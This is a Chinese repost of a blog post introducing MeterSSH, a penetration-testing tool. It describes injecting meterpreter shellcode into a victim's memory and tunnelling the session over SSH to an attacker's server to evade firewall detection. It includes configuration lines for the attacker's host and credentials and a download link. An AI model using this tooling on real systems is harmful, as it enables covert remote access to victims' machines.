MeterSSH – Meterpreter over SSH基于SSH的meterpreter

来源:互联网 发布:淘宝多少天可换货 编辑:程序博客网 时间:2024/06/05 20:06

from: https://www.trustedsec.com/november-2014/meterssh-meterpreter-ssh/

对于渗透者,确定哪些类型的攻击会被检测出十分重要。最近在渗透测试下一代防火墙后发现,大多数分析已把重点从末端偏向网络分析。两者混合meterssh表明了它是多么容易就能规避这许多基于签名的“下一代”的产品

meterssh很容易通过一个ssh隧道注入shellcode进内存并通过ssh传输任意数据到攻击者,这一切都包含在一个python文件中。pyinstaller或py2exePython很容易把python转换为可执行文件

meterssh很易用–只要编辑meterssh.py文件并添加您的SSH服务器IP,端口,用户名,密码,然后运行脚本。它将通过内存注入孵化出一个meterpreter(在我这,是Windows / meterpreter / bind_tcp)并绑定到端口8021。paramikoPython 的SSH模块)用于传输meterpreter于端口8021回到攻击者机器并于SSH隧道进行所有的通讯

这里我们启动初始的 meterssh payload:

接下来启动 monitor.py 监控有没有ssh连接,然后自动为你启动Metasploit. 一旦检测到 SSH connection 与shell 它会为你弹出 Metasploit :

接下来, Metasploit 启动 注意点我们通过localhost连接受害者.

这有2个文件。 monitor.py 和 meterssh.py.

monitor.py – 监听一个 SSH 连接, 它会绑到8021,然后启动metersploit.

meterssh.py – 受害者运行,也可以是py2exe 需要安装python或 pyinstaller打包好的exe.

 meterssh.py中需要自己调整的

user = “sshuser”# password for SSHpassword = “sshpw”# this is where your SSH server is runningrhost = “192.168.1.1”# remote SSH port – this is the attackers SSH serverport = “22”

上面都填攻击者的信息。

注意,你不需要改变Metasploit shellcode,那仅仅是个未经修改的Windows / meterpreter / bind_tcp绑定到端口8021。如果你想改变这个,只是切换shellcode和端口8021内的脚本以绑定到任何你想要的端口。不过,除非您真想定制/修改

从这下载:https://github.com/trustedsec/meterssh

-----------

最新消息,在我的win8上失败了...这玩意靠谱吗?


0 0